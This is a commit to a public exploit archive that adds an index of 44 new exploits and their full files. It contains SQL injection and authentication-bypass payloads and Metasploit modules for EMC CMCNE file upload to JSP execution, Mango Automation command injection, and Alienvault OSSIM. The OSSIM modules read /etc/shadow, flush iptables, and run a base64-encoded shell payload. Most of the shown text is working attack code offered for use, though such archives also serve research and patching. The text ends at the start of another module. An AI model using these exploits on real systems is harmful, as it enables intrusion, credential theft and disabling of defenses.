DB: 2017-09-14

44 new exploits

Mako Web Server 2.5 - Multiple Vulnerabilities
ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)
Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)
Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)
Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)
Alienvault Open Source SIEM (OSSIM) < 4.8.0 -  'get_file' Information Disclosure (Metasploit)
Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)
Infinite Automation Mango Automation - Command Injection (Metasploit)
Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)
EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)
Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)
Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
Microsoft Windows .NET Framework - Remote Code Execution
ICLowBidAuction 3.3 - SQL Injection
ICMLM 2.1 - 'key' Parameter SQL Injection
ICHotelReservation 3.3 - 'key' Parameter SQL Injection
ICAuction 2.2 - 'id' Parameter SQL Injection
ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection
ICRestaurant software 1.4 - 'key' Parameter SQL Injection
ICDutchAuction 1.2 - SQL Injection
ICAutosales 2.2 - SQL Injection
ICTraveling 2.2 - Authentication Bypass
ICStudents 1.2 - 'key' Parameter SQL Injection
ICClassifieds 1.1 - SQL Injection
ICSurvey 1.1 - SQL Injection
ICJewelry 1.1 - 'key' Parameter SQL Injection
IC-T-Shirt 1.2 - 'key' Parameter SQL Injection
ICProductConfigurator 1.1 - 'key' Parameter SQL Injection
ICGrocery 1.1 - 'key' Parameter SQL Injection
ICCallLimousine 1.1 - 'key' Parameter SQL Injection
ICProjectBidding 1.1 - SQL Injection
ICDental Clinic 1.2 - 'key' Parameter SQL Injection
ICEstate 1.1 - 'id' Parameter SQL Injection
ICHelpDesk 1.1 - 'pk' Parameter SQL Injection
ICSiteBuilder 1.1 - SQL Injection
ICAffiliateTracking 1.1 - Authentication Bypass
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)
Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)
Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)
Carel PlantVisor 2.4.4 - Directory Traversal
This commit is contained in:
Offensive Security 2017-09-14 05:01:22 +00:00
parent 590c03106b
commit 183eb53e48
46 changed files with 2836 additions and 24 deletions

View file

@ -15802,6 +15802,23 @@ id,file,description,date,author,platform,type,port
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814
42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0
42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0
42700,platforms/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42701,platforms/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
42702,platforms/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
42703,platforms/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42704,platforms/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38448,3 +38465,30 @@ id,file,description,date,author,platform,type,port
42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42667,platforms/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42673,platforms/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42674,platforms/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42675,platforms/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps,0
42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42676,platforms/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42678,platforms/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42685,platforms/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0
42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42689,platforms/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
42690,platforms/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps,0
42699,platforms/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0

Can't render this file because it is too large.

27
platforms/asp/webapps/42690.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Affiliate Tracking Script 1.1 - Authentication Bypass
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/affiliates-tracking-script.htm
# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/icaffiliatetracking/adminlogin.asp
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/real-estate-marketplace-site.htm
# Demo: http://www.icloudcenter.com/demos/icestatemarket/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/details.aspx?id=[SQL]
#
# Etc..
# # # # #

78
platforms/java/remote/42701.rb Executable file
View file

@ -0,0 +1,78 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a file upload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet found within the
Inmservlets.war archive. This allows the attacker to upload a
specially crafted file which leads to remote code execution in the
context of the server user.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '13-280' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("inmservlets", "FileUploadController"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' => {
'ROOTDIR' => "ftproot"
}
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end

78
platforms/java/remote/42702.rb Executable file
View file

@ -0,0 +1,78 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a fileupload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet. This allows the
attacker to upload a malicious jsp file to anywhere on the remote
file system.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
[ 'ZDI', '13-279' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
data = Rex::MIME::Message.new
data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
print_status("#{peer} - Uploading the JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("HttpFileUpload", "FileUploadController.do"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
print_good("File uploaded successfully!")
print_status("Executing '#{@jsp_name}' now...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
})
else
print_error("Does not look like the files were uploaded to #{peer}...")
end
end
end

114
platforms/jsp/remote/42698.rb Executable file
View file

@ -0,0 +1,114 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Infinite Automation Mango Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability found in Infinite
Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
430).
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-7901' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
],
'DisclosureDate' => 'Oct 28 2015'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
OptString.new('USER', [true, 'The username to login with', 'admin']),
OptString.new('PASS', [true, 'The password to login with', 'admin']),
], self.class )
end
def do_login(user, pass)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
end
cookie = res.headers['Set-Cookie']
print_status("Attempting to login with credentials '#{user}:#{pass}'")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => cookie,
'vars_post' => {
'username' => user,
'password' => pass,
}
})
if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
end
location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
print_good("#{peer} - Successful login: '#{user}:#{pass}'")
else
vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
return
end
return cookie
end
def run
cookie = do_login(datastore['USER'], datastore['PASS'])
data = "callCount=1&"
data << "page=%2Fevent_handlers.shtm&"
data << "httpSessionId=%0D%0A&"
data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
data << "c0-scriptName=EventHandlersDwr&"
data << "c0-methodName=testProcessCommand&"
data << "c0-id=0&"
data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
data << "c0-param1=string:15&"
data << "batchId=24"
res = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
'cookie' => cookie.split(";")[0],
'ctype' => "application/x-www-form-urlencoded",
'headers' => {
'Origin' => 'null',
'Upgrade-Insecure-Requests' => 1,
'Connection' => "keep-alive"
},
'data' => data,
}, 5)
if res.body =~ /org.directwebremoting.extend.MarshallException/
print_error("Something went wrong...")
puts res.body
elsif res.body =~ /Check your Tomcat console for process output/
print_good("Command executed successfully")
end
end
end

119
platforms/linux/remote/42695.rb Executable file
View file

@ -0,0 +1,119 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability found within the get_file
function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
that allows for the leaking of arbitrary file information.
},
'References' =>
[
[ 'CVE', '2014-4153' ],
[ 'ZDI', '14-207' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 13 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<get_file xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "<c-gensym11 xsi:type=\"xsd:string\">#{datastore['FILE']}</c-gensym11>\r\n"
soap += "</get_file>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#get_file\""
}
}, 20)
if res && res.code == 200
print_good("Dumping contents of #{datastore['FILE']} now...")
data = res.body.scan(/(?<=xsi:type="soapenc:Array"><item xsi:type="xsd:string">)[\S\s]+<\/item><item xsi:type="xsd:string">/)
puts data[0].split("<")[0]
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_file {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
= @_;
my $file_content;
verbose_log_file(
"GET FILE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
);
if ($r_file =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed r_file: $r_file in get_file\n");
my @ret = ("Error");
return \@ret;
}
if ( !-f "$r_file" ) {
#my @ret = ("Error");
verbose_log_file("Error file $r_file not found!");
# Return empty file if not exists
my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
return \@ret;
}
my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );
if ( open( my $ifh, $r_file ) ) {
binmode($ifh);
$file_content = do { local $/; <$ifh> };
close($ifh);
my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
return \@ret;
}
else {
my @ret = ("Error");
verbose_log_file("Error file $r_file not found!");
return \@ret;
}
}

237
platforms/linux/remote/42697.rb Executable file
View file

@ -0,0 +1,237 @@
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_license',
'Description' => %q{
This module exploits a command injection flaw found in the get_license
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $license_type parameter passed to a string which is then
executed by the system.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-5210' ],
[ 'ZDI', '14-294' ],
[ 'BID', '69239' ],
[ 'URL', 'https://www.alienvault.com/forums/discussion/2690' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Alienvault <= 4.7.0',{}]
],
'DisclosureDate' => 'Aug 14 2014'))
register_options([Opt::RPORT(40007)], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def build_soap_request(method, pass)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[0].text = "All"
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[2].text = "#{datastore['RHOST']}"
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
args[3].text = "#{rand_text_alpha(4 + rand(4))}"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
if pass == '0'
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64("iptables --flush")}\"))"
args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
elsif pass == '1'
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
end
xml.to_s
end
def send_soap_request(method, timeout=20, action)
if action == 'disable'
soap = build_soap_request(method, '0')
elsif action == 'pop_shell'
soap = build_soap_request(method, '1')
end
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
def exploit
print_status("Disabling firewall...")
send_soap_request("get_license", 1, "disable")
print_status("Popping shell...")
send_soap_request("get_license", 1, "pop_shell")
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
verbose_log_file(
"LICENSE $license_type:Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre,$license,$license_type)"
);
my $deb='/usr/share/ossim-installer/temp/avl.deb';
my $header='/usr/share/ossim-installer/temp/header';
unlink $deb if ( -f $deb ); #delete previous file if found
unlink $header if ( -f $header ); #delete previous file if found
my $user_agent_uuid = AV::uuid::get_uuid;
$SIG{CHLD} = 'DEFAULT';
my $license_encoded = uri_escape($license);
my $package = system ( "curl --proxy-anyauth -K /etc/curlrc --max-time 20 --user-agent $user_agent_uuid --dump-header $header -o $deb http://data.alienvault.com/avl/$license_type/?license=$license_encoded" );
$SIG{CHLD} = 'IGNORE';
my @out = q{};
if ( !-e $header || -z $header ) {
@out = ( '1', 'Imposible to connect. Please check your network configuration' );
unlink $header;
return \@out;
}
if ( -e $deb ) {
open HEADERFILE, "< $header" or die "Not $!";
my @header_content = <HEADERFILE>;
close(HEADERFILE);
my $response_ok = 0;
foreach (@header_content) {
if ( $_ =~ / 200 OK/) {
$response_ok = 1;
}
}
if ( $response_ok == 0 ) {
@out = ( '1', 'Imposible to connect. Please check your network configuration' );
unlink $header;
unlink $deb;
return \@out;
}
$SIG{CHLD} = 'DEFAULT';
my $command = "/usr/bin/dpkg -i --force-confnew $deb";
verbose_log_file ("LICENSE $license_type: $command");
my $result = qx{$command};
$SIG{CHLD} = 'IGNORE';
$result >>= 8 ;
if ( $result == 0 ) {
verbose_log_file ("LICENSE $license_type: SUCCESS. Installed");
unlink $deb;
unlink $header;
@out = ( '0', 'SUCCESS. Installed' );
return \@out;
}
else
{
verbose_log_file ("LICENSE $license_type: ERROR. Install failed");
@out = ( '2', 'ERROR. Install failed' );
unlink $deb;
unlink $header;
return \@out;
}
}
else
{
my $error_msg;
verbose_log_file ("LICENSE $license_type: ERROR MSG");
open LFILE, "< $header" or die "Not $!";
my @header_msg = <LFILE>;
close(LFILE);
foreach(@header_msg){
verbose_log_file ($_);
if ($_ =~ m/X-AV-ERROR/)
{
$error_msg = $_;
}
}
unlink $header;
@out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n
return \@out;
}
}

154
platforms/linux/remote/42708.rb Executable file
View file

@ -0,0 +1,154 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
